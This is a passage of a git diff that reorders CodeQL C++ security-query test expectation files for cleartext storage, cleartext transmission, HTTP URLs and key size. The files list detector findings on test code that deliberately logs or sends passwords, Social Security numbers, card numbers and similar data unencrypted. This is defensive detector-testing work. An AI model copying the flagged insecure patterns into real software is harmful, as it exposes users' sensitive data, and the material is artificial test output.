password | this source. | -| test2.cpp:44:2:44:8 | call to fprintf | test2.cpp:44:37:44:45 | thepasswd | test2.cpp:44:37:44:45 | thepasswd | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:44:37:44:45 | thepasswd | this source. | -| test2.cpp:45:2:45:8 | call to fprintf | test2.cpp:45:38:45:47 | accountkey | test2.cpp:45:38:45:47 | accountkey | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:45:38:45:47 | accountkey | this source. | -| test2.cpp:50:2:50:8 | call to fprintf | test2.cpp:50:41:50:53 | passwd_config | test2.cpp:50:41:50:53 | passwd_config | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:50:41:50:53 | passwd_config | this source. | -| test2.cpp:54:2:54:8 | call to fprintf | test2.cpp:54:41:54:52 | widepassword | test2.cpp:54:41:54:52 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:54:41:54:52 | widepassword | this source. | -| test2.cpp:55:2:55:8 | call to fprintf | test2.cpp:55:40:55:51 | widepassword | test2.cpp:55:40:55:51 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:55:40:55:51 | widepassword | this source. | -| test2.cpp:57:2:57:8 | call to fprintf | test2.cpp:57:39:57:49 | call to getPassword | test2.cpp:57:39:57:49 | call to getPassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:57:39:57:49 | call to getPassword | this source. | -| test2.cpp:65:3:65:9 | call to fprintf | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:62:18:62:25 | password | this source. | -| test2.cpp:73:3:73:9 | call to fprintf | test2.cpp:72:15:72:24 | password | test2.cpp:73:30:73:32 | *buf | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:72:17:72:24 | password | this source. | -| test2.cpp:99:3:99:9 | call to fprintf | test2.cpp:98:45:98:52 | password | test2.cpp:99:27:99:32 | *buffer | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:98:45:98:52 | password | this source. | -| test.cpp:45:3:45:7 | call to fputs | test.cpp:45:9:45:19 | thePassword | test.cpp:45:9:45:19 | thePassword | This write into file 'file' may contain unencrypted data from $@. | test.cpp:45:9:45:19 | thePassword | this source. | -| test.cpp:70:35:70:35 | call to operator<< | test.cpp:70:38:70:48 | thePassword | test.cpp:70:38:70:48 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:70:38:70:48 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:73:43:73:53 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:43:73:53 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:73:63:73:73 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:63:73:73 | thePassword | this source. | edges | test2.cpp:62:18:62:25 | password | test2.cpp:62:18:62:25 | password | provenance | | | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | provenance | | @@ -42,3 +26,19 @@ nodes | test.cpp:73:43:73:53 | thePassword | semmle.label | thePassword | | test.cpp:73:63:73:73 | thePassword | semmle.label | thePassword | subpaths +#select +| test2.cpp:43:2:43:8 | call to fprintf | test2.cpp:43:36:43:43 | password | test2.cpp:43:36:43:43 | password | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:43:36:43:43 | password | this source. | +| test2.cpp:44:2:44:8 | call to fprintf | test2.cpp:44:37:44:45 | thepasswd | test2.cpp:44:37:44:45 | thepasswd | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:44:37:44:45 | thepasswd | this source. | +| test2.cpp:45:2:45:8 | call to fprintf | test2.cpp:45:38:45:47 | accountkey | test2.cpp:45:38:45:47 | accountkey | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:45:38:45:47 | accountkey | this source. | +| test2.cpp:50:2:50:8 | call to fprintf | test2.cpp:50:41:50:53 | passwd_config | test2.cpp:50:41:50:53 | passwd_config | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:50:41:50:53 | passwd_config | this source. | +| test2.cpp:54:2:54:8 | call to fprintf | test2.cpp:54:41:54:52 | widepassword | test2.cpp:54:41:54:52 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:54:41:54:52 | widepassword | this source. | +| test2.cpp:55:2:55:8 | call to fprintf | test2.cpp:55:40:55:51 | widepassword | test2.cpp:55:40:55:51 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:55:40:55:51 | widepassword | this source. | +| test2.cpp:57:2:57:8 | call to fprintf | test2.cpp:57:39:57:49 | call to getPassword | test2.cpp:57:39:57:49 | call to getPassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:57:39:57:49 | call to getPassword | this source. | +| test2.cpp:65:3:65:9 | call to fprintf | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:62:18:62:25 | password | this source. | +| test2.cpp:73:3:73:9 | call to fprintf | test2.cpp:72:15:72:24 | password | test2.cpp:73:30:73:32 | *buf | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:72:17:72:24 | password | this source. | +| test2.cpp:99:3:99:9 | call to fprintf | test2.cpp:98:45:98:52 | password | test2.cpp:99:27:99:32 | *buffer | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:98:45:98:52 | password | this source. | +| test.cpp:45:3:45:7 | call to fputs | test.cpp:45:9:45:19 | thePassword | test.cpp:45:9:45:19 | thePassword | This write into file 'file' may contain unencrypted data from $@. | test.cpp:45:9:45:19 | thePassword | this source. | +| test.cpp:70:35:70:35 | call to operator<< | test.cpp:70:38:70:48 | thePassword | test.cpp:70:38:70:48 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:70:38:70:48 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:73:43:73:53 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:43:73:53 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:73:63:73:73 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:63:73:73 | thePassword | this source. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected index 370555e6811b..fae3d76599a8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected @@ -1,44 +1,3 @@ -#select -| test3.cpp:22:3:22:6 | call to send | test3.cpp:22:15:22:23 | password1 | test3.cpp:22:15:22:23 | password1 | This operation transmits 'password1', which may contain unencrypted sensitive data from $@. | test3.cpp:22:15:22:23 | password1 | password1 | -| test3.cpp:26:3:26:6 | call to send | test3.cpp:26:15:26:23 | password2 | test3.cpp:26:15:26:23 | password2 | This operation transmits 'password2', which may contain unencrypted sensitive data from $@. | test3.cpp:26:15:26:23 | password2 | password2 | -| test3.cpp:47:3:47:6 | call to recv | test3.cpp:47:15:47:22 | password | test3.cpp:47:15:47:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:47:15:47:22 | password | password | -| test3.cpp:55:3:55:6 | call to recv | test3.cpp:55:15:55:22 | password | test3.cpp:55:15:55:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:55:15:55:22 | password | password | -| test3.cpp:76:3:76:6 | call to send | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:74:21:74:29 | password1 | password1 | -| test3.cpp:83:3:83:6 | call to recv | test3.cpp:81:15:81:22 | password | test3.cpp:83:15:83:17 | ptr | This operation receives into 'ptr', which may put unencrypted sensitive data into $@. | test3.cpp:81:15:81:22 | password | password | -| test3.cpp:101:3:101:6 | call to read | test3.cpp:101:12:101:19 | password | test3.cpp:101:12:101:19 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:101:12:101:19 | password | password | -| test3.cpp:114:2:114:5 | call to recv | test3.cpp:134:11:134:18 | password | test3.cpp:114:14:114:19 | buffer | This operation receives into 'buffer', which may put unencrypted sensitive data into $@. | test3.cpp:134:11:134:18 | password | password | -| test3.cpp:140:3:140:6 | call to send | test3.cpp:138:24:138:32 | password1 | test3.cpp:140:15:140:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:138:24:138:32 | password1 | password1 | -| test3.cpp:146:3:146:6 | call to send | test3.cpp:126:9:126:23 | global_password | test3.cpp:146:15:146:18 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:126:9:126:23 | global_password | global_password | -| test3.cpp:159:3:159:6 | call to send | test3.cpp:157:19:157:26 | password | test3.cpp:159:15:159:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:157:19:157:26 | password | password | -| test3.cpp:228:2:228:5 | call to send | test3.cpp:228:26:228:33 | password | test3.cpp:228:26:228:33 | password | This operation transmits 'password', which may contain unencrypted sensitive data from $@. | test3.cpp:228:26:228:33 | password | password | -| test3.cpp:241:2:241:6 | call to fgets | test3.cpp:241:8:241:15 | password | test3.cpp:241:8:241:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:241:8:241:15 | password | password | -| test3.cpp:272:3:272:6 | call to send | test3.cpp:270:16:270:23 | password | test3.cpp:272:15:272:18 | *data | This operation transmits '*data', which may contain unencrypted sensitive data from $@. | test3.cpp:270:16:270:23 | password | password | -| test3.cpp:290:2:290:5 | call to send | test3.cpp:317:11:317:19 | password1 | test3.cpp:290:14:290:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:317:11:317:19 | password1 | password1 | -| test3.cpp:295:2:295:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:295:14:295:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | -| test3.cpp:300:2:300:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:300:14:300:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | -| test3.cpp:341:4:341:7 | call to recv | test3.cpp:341:16:341:23 | password | test3.cpp:341:16:341:23 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:341:16:341:23 | password | password | -| test3.cpp:388:3:388:6 | call to recv | test3.cpp:388:15:388:22 | password | test3.cpp:388:15:388:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:388:15:388:22 | password | password | -| test3.cpp:414:3:414:6 | call to recv | test3.cpp:414:15:414:24 | password | test3.cpp:414:15:414:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:414:15:414:24 | password | password | -| test3.cpp:420:3:420:6 | call to recv | test3.cpp:420:15:420:24 | password | test3.cpp:420:15:420:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:420:15:420:24 | password | password | -| test3.cpp:431:2:431:6 | call to fgets | test3.cpp:431:8:431:15 | password | test3.cpp:431:8:431:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:431:8:431:15 | password | password | -| test3.cpp:507:2:507:5 | call to send | test3.cpp:507:14:507:39 | social_security_number | test3.cpp:507:14:507:39 | social_security_number | This operation transmits 'social_security_number', which may contain unencrypted sensitive data from $@. | test3.cpp:507:14:507:39 | social_security_number | social_security_number | -| test3.cpp:508:2:508:5 | call to send | test3.cpp:508:14:508:33 | socialSecurityNo | test3.cpp:508:14:508:33 | socialSecurityNo | This operation transmits 'socialSecurityNo', which may contain unencrypted sensitive data from $@. | test3.cpp:508:14:508:33 | socialSecurityNo | socialSecurityNo | -| test3.cpp:509:2:509:5 | call to send | test3.cpp:509:14:509:29 | homePostCode | test3.cpp:509:14:509:29 | homePostCode | This operation transmits 'homePostCode', which may contain unencrypted sensitive data from $@. | test3.cpp:509:14:509:29 | homePostCode | homePostCode | -| test3.cpp:510:2:510:5 | call to send | test3.cpp:510:14:510:28 | my_zip_code | test3.cpp:510:14:510:28 | my_zip_code | This operation transmits 'my_zip_code', which may contain unencrypted sensitive data from $@. | test3.cpp:510:14:510:28 | my_zip_code | my_zip_code | -| test3.cpp:511:2:511:5 | call to send | test3.cpp:511:14:511:26 | telephone | test3.cpp:511:14:511:26 | telephone | This operation transmits 'telephone', which may contain unencrypted sensitive data from $@. | test3.cpp:511:14:511:26 | telephone | telephone | -| test3.cpp:512:2:512:5 | call to send | test3.cpp:512:14:512:36 | mobile_phone_number | test3.cpp:512:14:512:36 | mobile_phone_number | This operation transmits 'mobile_phone_number', which may contain unencrypted sensitive data from $@. | test3.cpp:512:14:512:36 | mobile_phone_number | mobile_phone_number | -| test3.cpp:513:2:513:5 | call to send | test3.cpp:513:14:513:22 | email | test3.cpp:513:14:513:22 | email | This operation transmits 'email', which may contain unencrypted sensitive data from $@. | test3.cpp:513:14:513:22 | email | email | -| test3.cpp:514:2:514:5 | call to send | test3.cpp:514:14:514:38 | my_credit_card_number | test3.cpp:514:14:514:38 | my_credit_card_number | This operation transmits 'my_credit_card_number', which may contain unencrypted sensitive data from $@. | test3.cpp:514:14:514:38 | my_credit_card_number | my_credit_card_number | -| test3.cpp:515:2:515:5 | call to send | test3.cpp:515:14:515:35 | my_bank_account_no | test3.cpp:515:14:515:35 | my_bank_account_no | This operation transmits 'my_bank_account_no', which may contain unencrypted sensitive data from $@. | test3.cpp:515:14:515:35 | my_bank_account_no | my_bank_account_no | -| test3.cpp:516:2:516:5 | call to send | test3.cpp:516:14:516:29 | employerName | test3.cpp:516:14:516:29 | employerName | This operation transmits 'employerName', which may contain unencrypted sensitive data from $@. | test3.cpp:516:14:516:29 | employerName | employerName | -| test3.cpp:517:2:517:5 | call to send | test3.cpp:517:14:517:29 | medical_info | test3.cpp:517:14:517:29 | medical_info | This operation transmits 'medical_info', which may contain unencrypted sensitive data from $@. | test3.cpp:517:14:517:29 | medical_info | medical_info | -| test3.cpp:518:2:518:5 | call to send | test3.cpp:518:14:518:28 | license_key | test3.cpp:518:14:518:28 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | test3.cpp:518:14:518:28 | license_key | license_key | -| test3.cpp:527:3:527:6 | call to send | test3.cpp:526:44:526:54 | my_latitude | test3.cpp:527:15:527:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:526:44:526:54 | my_latitude | my_latitude | -| test3.cpp:533:3:533:6 | call to send | test3.cpp:532:45:532:58 | home_longitude | test3.cpp:533:15:533:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:532:45:532:58 | home_longitude | home_longitude | -| test3.cpp:552:3:552:6 | call to send | test3.cpp:551:47:551:58 | salaryString | test3.cpp:552:15:552:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:551:47:551:58 | salaryString | salaryString | -| test3.cpp:559:3:559:6 | call to send | test3.cpp:556:19:556:30 | salaryString | test3.cpp:559:15:559:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:556:19:556:30 | salaryString | salaryString | -| test3.cpp:572:2:572:5 | call to send | test3.cpp:571:8:571:21 | call to get_home_phone | test3.cpp:572:14:572:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:571:8:571:21 | call to get_home_phone | call to get_home_phone | -| test3.cpp:578:2:578:5 | call to send | test3.cpp:577:8:577:23 | call to get_home_address | test3.cpp:578:14:578:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:577:8:577:23 | call to get_home_address | call to get_home_address | edges | test3.cpp:74:21:74:29 | password1 | test3.cpp:74:21:74:29 | password1 | provenance | | | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | provenance | | @@ -181,3 +140,44 @@ nodes | test3.cpp:578:14:578:16 | str | semmle.label | str | subpaths | test3.cpp:138:24:138:32 | password1 | test3.cpp:117:28:117:33 | buffer | test3.cpp:117:13:117:14 | *id | test3.cpp:138:21:138:22 | call to id | +#select +| test3.cpp:22:3:22:6 | call to send | test3.cpp:22:15:22:23 | password1 | test3.cpp:22:15:22:23 | password1 | This operation transmits 'password1', which may contain unencrypted sensitive data from $@. | test3.cpp:22:15:22:23 | password1 | password1 | +| test3.cpp:26:3:26:6 | call to send | test3.cpp:26:15:26:23 | password2 | test3.cpp:26:15:26:23 | password2 | This operation transmits 'password2', which may contain unencrypted sensitive data from $@. | test3.cpp:26:15:26:23 | password2 | password2 | +| test3.cpp:47:3:47:6 | call to recv | test3.cpp:47:15:47:22 | password | test3.cpp:47:15:47:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:47:15:47:22 | password | password | +| test3.cpp:55:3:55:6 | call to recv | test3.cpp:55:15:55:22 | password | test3.cpp:55:15:55:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:55:15:55:22 | password | password | +| test3.cpp:76:3:76:6 | call to send | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:74:21:74:29 | password1 | password1 | +| test3.cpp:83:3:83:6 | call to recv | test3.cpp:81:15:81:22 | password | test3.cpp:83:15:83:17 | ptr | This operation receives into 'ptr', which may put unencrypted sensitive data into $@. | test3.cpp:81:15:81:22 | password | password | +| test3.cpp:101:3:101:6 | call to read | test3.cpp:101:12:101:19 | password | test3.cpp:101:12:101:19 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:101:12:101:19 | password | password | +| test3.cpp:114:2:114:5 | call to recv | test3.cpp:134:11:134:18 | password | test3.cpp:114:14:114:19 | buffer | This operation receives into 'buffer', which may put unencrypted sensitive data into $@. | test3.cpp:134:11:134:18 | password | password | +| test3.cpp:140:3:140:6 | call to send | test3.cpp:138:24:138:32 | password1 | test3.cpp:140:15:140:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:138:24:138:32 | password1 | password1 | +| test3.cpp:146:3:146:6 | call to send | test3.cpp:126:9:126:23 | global_password | test3.cpp:146:15:146:18 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:126:9:126:23 | global_password | global_password | +| test3.cpp:159:3:159:6 | call to send | test3.cpp:157:19:157:26 | password | test3.cpp:159:15:159:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:157:19:157:26 | password | password | +| test3.cpp:228:2:228:5 | call to send | test3.cpp:228:26:228:33 | password | test3.cpp:228:26:228:33 | password | This operation transmits 'password', which may contain unencrypted sensitive data from $@. | test3.cpp:228:26:228:33 | password | password | +| test3.cpp:241:2:241:6 | call to fgets | test3.cpp:241:8:241:15 | password | test3.cpp:241:8:241:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:241:8:241:15 | password | password | +| test3.cpp:272:3:272:6 | call to send | test3.cpp:270:16:270:23 | password | test3.cpp:272:15:272:18 | *data | This operation transmits '*data', which may contain unencrypted sensitive data from $@. | test3.cpp:270:16:270:23 | password | password | +| test3.cpp:290:2:290:5 | call to send | test3.cpp:317:11:317:19 | password1 | test3.cpp:290:14:290:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:317:11:317:19 | password1 | password1 | +| test3.cpp:295:2:295:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:295:14:295:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | +| test3.cpp:300:2:300:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:300:14:300:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | +| test3.cpp:341:4:341:7 | call to recv | test3.cpp:341:16:341:23 | password | test3.cpp:341:16:341:23 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:341:16:341:23 | password | password | +| test3.cpp:388:3:388:6 | call to recv | test3.cpp:388:15:388:22 | password | test3.cpp:388:15:388:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:388:15:388:22 | password | password | +| test3.cpp:414:3:414:6 | call to recv | test3.cpp:414:15:414:24 | password | test3.cpp:414:15:414:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:414:15:414:24 | password | password | +| test3.cpp:420:3:420:6 | call to recv | test3.cpp:420:15:420:24 | password | test3.cpp:420:15:420:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:420:15:420:24 | password | password | +| test3.cpp:431:2:431:6 | call to fgets | test3.cpp:431:8:431:15 | password | test3.cpp:431:8:431:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:431:8:431:15 | password | password | +| test3.cpp:507:2:507:5 | call to send | test3.cpp:507:14:507:39 | social_security_number | test3.cpp:507:14:507:39 | social_security_number | This operation transmits 'social_security_number', which may contain unencrypted sensitive data from $@. | test3.cpp:507:14:507:39 | social_security_number | social_security_number | +| test3.cpp:508:2:508:5 | call to send | test3.cpp:508:14:508:33 | socialSecurityNo | test3.cpp:508:14:508:33 | socialSecurityNo | This operation transmits 'socialSecurityNo', which may contain unencrypted sensitive data from $@. | test3.cpp:508:14:508:33 | socialSecurityNo | socialSecurityNo | +| test3.cpp:509:2:509:5 | call to send | test3.cpp:509:14:509:29 | homePostCode | test3.cpp:509:14:509:29 | homePostCode | This operation transmits 'homePostCode', which may contain unencrypted sensitive data from $@. | test3.cpp:509:14:509:29 | homePostCode | homePostCode | +| test3.cpp:510:2:510:5 | call to send | test3.cpp:510:14:510:28 | my_zip_code | test3.cpp:510:14:510:28 | my_zip_code | This operation transmits 'my_zip_code', which may contain unencrypted sensitive data from $@. | test3.cpp:510:14:510:28 | my_zip_code | my_zip_code | +| test3.cpp:511:2:511:5 | call to send | test3.cpp:511:14:511:26 | telephone | test3.cpp:511:14:511:26 | telephone | This operation transmits 'telephone', which may contain unencrypted sensitive data from $@. | test3.cpp:511:14:511:26 | telephone | telephone | +| test3.cpp:512:2:512:5 | call to send | test3.cpp:512:14:512:36 | mobile_phone_number | test3.cpp:512:14:512:36 | mobile_phone_number | This operation transmits 'mobile_phone_number', which may contain unencrypted sensitive data from $@. | test3.cpp:512:14:512:36 | mobile_phone_number | mobile_phone_number | +| test3.cpp:513:2:513:5 | call to send | test3.cpp:513:14:513:22 | email | test3.cpp:513:14:513:22 | email | This operation transmits 'email', which may contain unencrypted sensitive data from $@. | test3.cpp:513:14:513:22 | email | email | +| test3.cpp:514:2:514:5 | call to send | test3.cpp:514:14:514:38 | my_credit_card_number | test3.cpp:514:14:514:38 | my_credit_card_number | This operation transmits 'my_credit_card_number', which may contain unencrypted sensitive data from $@. | test3.cpp:514:14:514:38 | my_credit_card_number | my_credit_card_number | +| test3.cpp:515:2:515:5 | call to send | test3.cpp:515:14:515:35 | my_bank_account_no | test3.cpp:515:14:515:35 | my_bank_account_no | This operation transmits 'my_bank_account_no', which may contain unencrypted sensitive data from $@. | test3.cpp:515:14:515:35 | my_bank_account_no | my_bank_account_no | +| test3.cpp:516:2:516:5 | call to send | test3.cpp:516:14:516:29 | employerName | test3.cpp:516:14:516:29 | employerName | This operation transmits 'employerName', which may contain unencrypted sensitive data from $@. | test3.cpp:516:14:516:29 | employerName | employerName | +| test3.cpp:517:2:517:5 | call to send | test3.cpp:517:14:517:29 | medical_info | test3.cpp:517:14:517:29 | medical_info | This operation transmits 'medical_info', which may contain unencrypted sensitive data from $@. | test3.cpp:517:14:517:29 | medical_info | medical_info | +| test3.cpp:518:2:518:5 | call to send | test3.cpp:518:14:518:28 | license_key | test3.cpp:518:14:518:28 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | test3.cpp:518:14:518:28 | license_key | license_key | +| test3.cpp:527:3:527:6 | call to send | test3.cpp:526:44:526:54 | my_latitude | test3.cpp:527:15:527:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:526:44:526:54 | my_latitude | my_latitude | +| test3.cpp:533:3:533:6 | call to send | test3.cpp:532:45:532:58 | home_longitude | test3.cpp:533:15:533:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:532:45:532:58 | home_longitude | home_longitude | +| test3.cpp:552:3:552:6 | call to send | test3.cpp:551:47:551:58 | salaryString | test3.cpp:552:15:552:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:551:47:551:58 | salaryString | salaryString | +| test3.cpp:559:3:559:6 | call to send | test3.cpp:556:19:556:30 | salaryString | test3.cpp:559:15:559:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:556:19:556:30 | salaryString | salaryString | +| test3.cpp:572:2:572:5 | call to send | test3.cpp:571:8:571:21 | call to get_home_phone | test3.cpp:572:14:572:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:571:8:571:21 | call to get_home_phone | call to get_home_phone | +| test3.cpp:578:2:578:5 | call to send | test3.cpp:577:8:577:23 | call to get_home_address | test3.cpp:578:14:578:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:577:8:577:23 | call to get_home_address | call to get_home_address | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected index 00185bff5faf..971cdb4f3ff3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected @@ -1,10 +1,3 @@ -#select -| test.cpp:24:21:24:40 | http://example.com | test.cpp:24:21:24:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:28:10:28:29 | http://example.com | test.cpp:28:10:28:29 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:35:23:35:42 | http://example.com | test.cpp:35:23:35:42 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:36:26:36:45 | http://example.com | test.cpp:36:26:36:45 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:46:18:46:26 | http:// | test.cpp:46:18:46:26 | *http:// | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:110:21:110:40 | http://example.com | test.cpp:110:21:110:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | edges | test.cpp:11:26:11:28 | *url | test.cpp:15:30:15:32 | *url | provenance | | | test.cpp:24:13:24:17 | **url_g | test.cpp:38:11:38:15 | *url_g | provenance | | @@ -48,3 +41,10 @@ nodes | test.cpp:116:3:116:37 | *... = ... | semmle.label | *... = ... | | test.cpp:121:11:121:13 | *ptr | semmle.label | *ptr | subpaths +#select +| test.cpp:24:21:24:40 | http://example.com | test.cpp:24:21:24:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:28:10:28:29 | http://example.com | test.cpp:28:10:28:29 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:35:23:35:42 | http://example.com | test.cpp:35:23:35:42 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:36:26:36:45 | http://example.com | test.cpp:36:26:36:45 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:46:18:46:26 | http:// | test.cpp:46:18:46:26 | *http:// | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:110:21:110:40 | http://example.com | test.cpp:110:21:110:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected index 4f1a66d4cdf5..ca20f65bec72 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected @@ -1,10 +1,10 @@ -#select -| test.cpp:34:5:34:38 | call to EVP_PKEY_CTX_set_dsa_paramgen_bits | test.cpp:34:45:34:48 | 1024 | 